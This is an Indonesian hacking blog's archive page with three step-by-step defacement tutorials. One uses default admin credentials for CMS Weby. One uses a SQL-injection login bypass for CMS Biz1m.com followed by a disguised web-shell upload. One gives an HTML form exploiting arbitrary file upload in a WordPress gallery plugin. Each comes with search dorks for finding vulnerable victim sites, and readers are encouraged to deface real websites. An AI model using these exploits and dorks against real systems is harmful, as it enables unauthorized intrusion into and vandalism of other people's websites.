Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan

Minggu, 09 Juli 2017

Admin Default CMS Weby Shell Upload


Hello World; Malaam Fans, Please Say Hello Haters ;*
begimane kabar lu pade ? akwkawkwa masih tetep jomblo kan xD wkwkwkw.
hahaha, dah Lamaaaaaa banget guaaa gak ngeBlog >,<" , sampe lupa ini cara ngetik artikel tutorial yang asik dan gak garing gimana (biasanya juga garing asuw).
ampee lupa juga cara login blog gimana awkkwakwakkwakwa.
artikel sebelumnya titipan sodara Dumay gua si bang pu.sh yang judulnya Tutorial Deface dengan Bypass Admin CMS Biz1m.com Shell Upload .
untuk sekarang gua dititipin tutor yg mungkin masih HOT juga dari Sodara Dumay gua, yaitu bang Mrcareless .
yups kali ini Tutorial Deface dengan Admin Default CMS Weby Shell Upload .


Dork : 
intext:WebyBackOffice
(kembangin lagi, biar bisa dapet yang vuln n verawan)
Admin page : /login.php
Exploit Default CMS Weby:
user: iweb
pass: iweb.mt

1. Search target menggunakan dork diatas atau kalian bisa mengembangkan dork tersebut untuk mendapatkan hasil yg fresh
2. jika sudah pilih 1 web target, dan di alamat website tambahin login.php
   ex : www.site.co.li/login.php

jika ragu utk letak page loginnya, ketikan admin saja pada web target, nanti akan redirect sendiri ke halaman login
3. Muncul Page Login Adminnya


4. Masukan Username dan Password Default Login CMS Weby


5. jika sukses akan masuk dashboard


6. jika gagal akan 403
7. setelah masuk klik di menu admin ngasal aja nanti jumpa tempat upload (untuk tempat upload di setiap site berbeda, disarankan untuk memakai otak sendiri untuk mencari tempat uploadnya :p )


8. upload shell 
9. klik kanan " open image image in new tab " pada shell yang tadi Lu upload


untuk sejauh ini upload shell tak perlu bypass ekstensi atau pun repot2 make tamper xD.
silahkan eXplore sendiri nih eXploit :p , kembangin lagi yaps

NB : Jika ingin melakukan patching, diharapkan jangan gblk, jangan page login admin di deface, kita belajar bersama disini :) -pu.sh

owh iya, Bila ada Link atau gambar pada Artikel Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Thanks to: Mrcareless

./Nuenomaru

Dan gue tertawa melihat para Hacker Pembual Mulai Bermunculan





Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Jumat, 23 Juni 2017

Bypass Admin CMS Biz1m.com


Hello World; Malaam Fans, Please Say Hello Haters ;*
begimana kabar lu pade ? ya gue tau , masih pade menjomblo kan :p wkwkkw xD
hahaha, dah Lamaaaaaa banget guaaa gak ngeBlog >,<" , sampe lupa ini cara ngetik artikel tutorial yang asik dan gak garing gimana (biasanya juga garing asuw).
ampee lupa juga cara login blog gimana awkkwakwakkwakwa.
gimana dikit lagi lebaran nih (bagi yang menjalankan), tapi sloww Kesalahan lu pada dah gue maafin kok wkwkwkkw.
Artikel Tutorial kali ini gue dikasih sama Keluarga Dumay gue yaitu bang pu.sh , tq bang pu.sh :*
kalo gak di titipin artikel, gue juga gak bakal buka blog lagi nih wkwkkw >..<"

langsung aja dah, gue baru sampe rumah. artikel kali ini adalah Tutorial Deface Website Bypass Admin CMS Biz1m.com.


Dork : intext:Jumlah ahli ahli vip jumlah lawatan
Admin page : /admin-cp/
Exploit : ‘ or 1=1 limit 1 -- -+

1. Search target menggunakan dork diatas atau kalian bisa mengembangkan dork tersebut untuk mendapatkan hasil yg fresh


2. Masuk ke web target, buka admin page nya di, http://target.com/admin-cp/


3. Masuka username : ‘ or 1=1 limit 1 -- -+ dan password : ‘ or 1=1 limit 1 -- -+


4. Jika sudah maka akan tampak admin dashboardnya


5. Jika sudah, sekarang waktunya upload shell, buka di http://target.com/admin-cp.php?buka=iklanvvip


6. Pilih edit, lalu sekarang kita upload shell dengan ext shell.php.jpg


7. Sebelum kita upload shell, buka Tamper Data,lalu start tamper data,klik submit,buka tampernya, kita edit nama file menjadi shell.php melalui tamper data.



Menjadii


8. Jika sudah, klik Ok, maka akan terupload shell / uploader kita, dan muncul link akses shell / uploader tersebut


9. Sekarang kita coba buka uploader yang sudah terupload, melalui link yang muncul di web target.


Dan liat, uploader nya sudah terupload, sekarang bebas kalian mau apa, disini saya hanya akan mengupload script di dir root nya.


Woot? Happy Deface !


NB : Jika ingin melakukan patching, diharapkan jangan gblk, jangan page login admin di deface, kita belajar bersama disini :) -pu.sh

dah ye, simpel kan ? intinye pinter2 lu Dorking dan eksekusi aja hehhe.
lanjutin deh, lu eXplore dewek nih eXploit & Bug (y) , moga membantu lu ye . ya minimal buat Refrensi aja awkkwaka xD

btw gimane , pada Mudik o.O ? kalo gue sendiri pan betawi tulen, jadinya gua mudik ke Kampung orang wkwkwk, ke kampungnya om ChrisCode00 wkwkkwkw xD
dah yee , selamat menikmati Liburan :p

owh iya, Bila ada Link atau gambar pada Artikel Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Thanks to: pu.sh

./Nuenomaru









Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Kamis, 06 April 2017

eXploit Dreamwork Gallery File Upload Vulnerability


Hello World; Soree Fans, Please Say Hello Haters ;*
apa Kabs ? Lanjut Blogwalking Om. akwkwa, maap2 lagi sibuk nulis ebook sama nulis SFTH, sembari donlod2 JAV uncensored sih :v #aanjaey xD awkkwa
seduh kopi dulu biar sans kale xD , okei kali ini Gue Bakal Share salah satu eXploit yang ada pada CMS WordPress.
ini merupakan salah satu Bug/Celah yang ada pada CMS berlogo W Biru >..< *suka2aingmhanx*

Yupz kali ini gue bakal Share Tutorial Deface Website BerCMS WordPress dengan eXploit Dreamwork Gallery File Upload Vulnerability .
Gua gak tau persis ye ini eXploit baru atau Lawas, soalnya gua muter2 barat ampe timur gak nemu yg bisa di sodok make Shell :3 udh Bypass ekstensi masih gagal.
kalo mao liat yang berhasil upload Shell cek di Source ya :) , karena utk kali ini gua cuma Upload Script dipesan saja :')

Lanjut intip tutorial


Dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Masukin ke Script Uploader dibawah

3. Copy Script dibawah:

<form action="www.target.c0li/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

*ganti target.c0li dengan target yg pen lu tusbol
*[path] = sesuaikan dgn target lu, ye kalo gak ada pathnya langsung masukin aja eXploitnya
*save dengan ekstensi .html = contoh.html

4. Masukin Shell/File yang pengen Lu Upload

kek yg tadi gua bilang, gua upload script dipesan langsung

5. nah langsung Muncul deh Letak Shell/File yang tadi udeh lu upload.
tinggal lu cek aja


#BooM~

Shell/File Akses: /wp-content/uploads/dreamwork/randomangka_uploadfolder/big/namafilelu
dah ye, simpel kan ? intinye pinter2 lu Dorking dan eksekusi aja hehhe.
lanjutin deh, lu eXplore dewek nih eXploit & Bug (y) , moga membantu lu ye . ya minimal buat Refrensi aja awkkwaka xD

owh iya, Bila ada Link atau gambar pada Artikel Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: xhac.kerr

./Nuenomaru


Lo Hebat soal Mencari Celah, tapi Maaf Attitude masih Lemah





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

 

ande ande lumoet Template by Ipietoon Cute Blog Design